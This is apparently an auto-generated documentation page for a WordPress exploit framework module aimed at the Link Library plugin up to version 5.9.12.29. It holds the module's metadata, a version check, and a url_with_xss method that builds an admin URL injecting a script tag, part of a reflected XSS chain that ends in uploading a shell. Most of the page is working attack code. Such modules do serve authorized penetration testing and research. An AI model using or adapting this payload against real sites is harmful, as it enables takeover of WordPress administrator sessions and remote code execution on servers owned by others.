class Wpxf::Exploit::LinkLibraryReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/link_library_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Link Library <= 5.9.12.29 Reflected XSS Shell Upload', author: [ 'Burak Kelebek', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8604'], ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_link_library_wordpress_plugin.html'] ], date: 'Aug 15 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/link_library_reflected_xss_shell_upload.rb, line 23 def check check_plugin_version_from_changelog('link-library', 'readme.txt', '5.9.12.30') end
url_with_xss()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/link_library_reflected_xss_shell_upload.rb, line 27 def url_with_xss normalize_uri( wordpress_url_admin, "admin.php?page=link-library-settingssets&messages=9&successimportcount=1%22%2F%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E¤ttab=importexport" ) end